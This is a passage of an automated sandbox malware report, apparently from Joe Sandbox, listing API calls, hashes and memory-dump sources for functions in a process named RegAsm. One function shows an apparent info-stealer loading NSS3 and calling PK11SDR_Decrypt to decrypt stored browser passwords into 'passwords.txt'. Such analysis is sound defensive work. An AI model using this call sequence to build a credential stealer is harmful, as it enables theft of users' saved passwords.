                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                • String ID:
                                                                                • API String ID: 2599614518-0
                                                                                • Opcode ID: bb227fb70db15008d3506cb77bd3e0cb2fe7a7ddd98e963f33a7b57713678ad7
                                                                                • Instruction ID: 7e0a7a5bace357342d00c61117c8909c4cf2bcd29efc52d906f0802e33e35782
                                                                                • Opcode Fuzzy Hash: bb227fb70db15008d3506cb77bd3e0cb2fe7a7ddd98e963f33a7b57713678ad7
                                                                                • Instruction Fuzzy Hash: A5E13AB1C0021AAFDF11AFE1DD49AAFBB79FF08304F10082AF615B2191DB794A54DB65
                                                                                Function 6C7FCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C7C582D), ref: 6C7FCC27
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C7C582D), ref: 6C7FCC3D
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C82FE98,?,?,?,?,?,6C7C582D), ref: 6C7FCC56
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC6C
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC82
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC98
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCCAE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C7FCCC4
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C7FCCDA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C7FCCEC
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C7FCCFE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C7FCD14
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C7FCD82
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C7FCD98
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C7FCDAE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C7FCDC4
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C7FCDDA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C7FCDF0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C7FCE06
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C7FCE1C
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C7FCE32
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C7FCE48
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C7FCE5E
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C7FCE74
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C7FCE8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strcmp
                                                                                • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                • API String ID: 1004003707-2809817890
                                                                                • Opcode ID: 4358e5d2e35d32dd4db2c06f066f3679c4824b3f5d2de86fc79477ebf25943a6
                                                                                • Instruction ID: bd68b460019d2a07ed643b0312a4655f506431561236dbaa928a3a7461e07488
                                                                                • Opcode Fuzzy Hash: 4358e5d2e35d32dd4db2c06f066f3679c4824b3f5d2de86fc79477ebf25943a6
                                                                                • Instruction Fuzzy Hash: 4A51969190523511FB3430195F9ABFE1448EF5224BF101C3AE929A2F81FB09D24B95F7
                                                                                Function 004083DC Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 258stringmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004083E1
                                                                                • NSS_Init.NSS3(00000000,?,00000000,?), ref: 004083FE
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004084E1
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004084E9
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004084F5
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 004084FF
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408510
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040851C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00408523
                                                                                • StrStrA.SHLWAPI(?), ref: 00408535
                                                                                • StrStrA.SHLWAPI(-00000010), ref: 0040854F
                                                                                • lstrcat.KERNEL32(00000000), ref: 00408563
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408575
                                                                                • lstrcat.KERNEL32(00000000,00425DA0), ref: 00408583
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408595
                                                                                • lstrcat.KERNEL32(00000000,00425DA4), ref: 004085A3
                                                                                • lstrcat.KERNEL32(00000000), ref: 004085B2
                                                                                • lstrcat.KERNEL32(00000000,-00000010), ref: 004085BC
                                                                                • lstrcat.KERNEL32(00000000,00425DA8), ref: 004085CA
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 004085DA
                                                                                • StrStrA.SHLWAPI(00000014), ref: 004085EA
                                                                                • lstrcat.KERNEL32(00000000), ref: 004085FE
                                                                                  • Part of subcall function 004082DE: memset.MSVCRT ref: 00408305
                                                                                  • Part of subcall function 004082DE: lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                  • Part of subcall function 004082DE: CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                  • Part of subcall function 004082DE: PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                  • Part of subcall function 004082DE: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                  • Part of subcall function 004082DE: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                  • Part of subcall function 004082DE: memcpy.MSVCRT ref: 00408391
                                                                                  • Part of subcall function 004082DE: PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040860F
                                                                                • lstrcat.KERNEL32(00000000,00425DAC), ref: 0040861D
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                  • Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
                                                                                  • Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
                                                                                • lstrcat.KERNEL32(00000000,00425DB0), ref: 00408670
                                                                                • lstrcat.KERNEL32(00000000,00425DB4), ref: 0040867E
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 0040868E
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004086A4
                                                                                • memset.MSVCRT ref: 004086F7
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408700
                                                                                • NSS_Shutdown.NSS3 ref: 00408706
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                • String ID: passwords.txt
                                                                                • API String ID: 2888107993-347816968
                                                                                • Opcode ID: c345fe592e1cdce2eca1688f09073984c8194a2ae32f9173536d15a579fc0409
                                                                                • Instruction ID: 74ae5be6afe1e2d88f77f626dab05c628996e9a235834d6add9aa2487cc7bb77
                                                                                • Opcode Fuzzy Hash: c345fe592e1cdce2eca1688f09073984c8194a2ae32f9173536d15a579fc0409
                                                                                • Instruction Fuzzy Hash: BCA16A72800169EFDB11ABE0DD49EEEBF7AFF19314F100439F611A21A1DB741A09CB65
                                                                                Function 00417330 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 154libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: kernel32.dll
                                                                                • API String ID: 2238633743-1793498882
                                                                                • Opcode ID: 456b25a0cd971aede1948dc80c935459e1bed061efa79df4c74d3183b5f1786d
                                                                                • Instruction ID: 1e89812948c469db96aeb5d4d8b58dd49809b204df9ca9e9fbbd52ba925c3bf0
                                                                                • Opcode Fuzzy Hash: 456b25a0cd971aede1948dc80c935459e1bed061efa79df4c74d3183b5f1786d
                                                                                • Instruction Fuzzy Hash: D8711A7E811620EFEB525FA0FD08A253BB7F70AB01B14713AEA05C6231E7764961EF14
                                                                                Function 6C7C4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7C4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7C44B2,6C83E21C,6C83F7F8), ref: 6C7C473E
                                                                                  • Part of subcall function 6C7C4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7C474A
                                                                                • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7C44BA
                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7C44D2
                                                                                • InitOnceExecuteOnce.KERNEL32(6C83F80C,6C7BF240,?,?), ref: 6C7C451A
                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7C455C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 6C7C4592
                                                                                • InitializeCriticalSection.KERNEL32(6C83F770), ref: 6C7C45A2
                                                                                • moz_xmalloc.MOZGLUE(00000008), ref: 6C7C45AA
                                                                                • moz_xmalloc.MOZGLUE(00000018), ref: 6C7C45BB
                                                                                • InitOnceExecuteOnce.KERNEL32(6C83F818,6C7BF240,?,?), ref: 6C7C4612
                                                                                • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C7C4636
                                                                                • LoadLibraryW.KERNEL32(user32.dll), ref: 6C7C4644
                                                                                • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7C466D
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C469F
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46AB
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46B2
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46B9
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46C0
                                                                                • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7C46CD
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6C7C46F1
                                                                                • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7C46FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                • API String ID: 1702738223-3894940629
                                                                                • Opcode ID: 7c3acd811372d72f2ccee68ea6f8711cb9a02c56338c701efe9d05e1795dd770
                                                                                • Instruction ID: c6e1d76fa13e3635b388bf81bb33744fffdf56e3a3bf98d3a55b499d4696a3a0
                                                                                • Opcode Fuzzy Hash: 7c3acd811372d72f2ccee68ea6f8711cb9a02c56338c701efe9d05e1795dd770
                                                                                • Instruction Fuzzy Hash: 1361E6B0700255AFEB309FA4CE09BA57BB8EF5630CF04ADA8E90C9B641D7749945CBD1
                                                                                Function 6C9A6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • memset.VCRUNTIME140(00000000,00000000,?,?,6C86BE66), ref: 6C9A6E81
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C86BE66), ref: 6C9A6E98
                                                                                • sqlite3_snprintf.NSS3(?,00000000,6CA0AAF9,?,?,?,?,?,?,6C86BE66), ref: 6C9A6EC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C86BE66), ref: 6C9A6ED2
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C86BE66), ref: 6C9A6EF8
                                                                                • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F1F
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F28
                                                                                • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F3D
                                                                                • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C86BE66), ref: 6C9A6FA6
                                                                                • sqlite3_snprintf.NSS3(?,00000000,6CA0AAF9,00000000,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FDB
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FE4
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FEF
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A7014
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,6C86BE66), ref: 6C9A701D
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C86BE66), ref: 6C9A7030
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A705B
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C86BE66), ref: 6C9A7079
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A7097
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A70A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                • API String ID: 593473924-707647140
                                                                                • Opcode ID: 0bf6d5d3fd5c4e72f89da578a3d9c2896c29b2768ec609f970d12d1fb3aa8ed0
                                                                                • Instruction ID: a583c65918f61c6b27703737f24187e2ad376fd930b1271b4b5f6ede5a1ea65d
                                                                                • Opcode Fuzzy Hash: 0bf6d5d3fd5c4e72f89da578a3d9c2896c29b2768ec609f970d12d1fb3aa8ed0
                                                                                • Instruction Fuzzy Hash: 3451CDB1B002215BE711567D9C51BBB362A9FA6308F144938E80597BC1FF65D52FC2E3
                                                                                Function 6C908E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_WrapKey), ref: 6C908E76
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C908EA4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908EB3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908EC9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C908EE5
                                                                                • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C908F17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908F29
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908F3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C908F71
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908F80
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908F96
                                                                                • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C908FB2
                                                                                • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C908FCD
                                                                                • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C909047
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
                                                                                • API String ID: 1003633598-4293906258
                                                                                • Opcode ID: 1ac70141593e1c01b19bd30c7d1ada6a2041d40c465d54f61005625bafdbbb8a
                                                                                • Instruction ID: fe36aa2190ba0171db9c407921ecc6da198fbfc4a4a536c74f5a549d1c5b63d3
                                                                                • Opcode Fuzzy Hash: 1ac70141593e1c01b19bd30c7d1ada6a2041d40c465d54f61005625bafdbbb8a
                                                                                • Instruction Fuzzy Hash: 29511331701205AFCB159F509D48F9A7BB6AF7630CF048429F508ABA12DB30C85ACBD6
                                                                                Function 6C934C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C50
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C5B
                                                                                • PR_smprintf.NSS3(6CA0AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C76
                                                                                • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934CAE
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934CC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934CF4
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934D0B
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934D5E
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934D68
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C934D85
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C934DA2
                                                                                • free.MOZGLUE(?), ref: 6C934DB9
                                                                                • free.MOZGLUE(00000000), ref: 6C934DCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
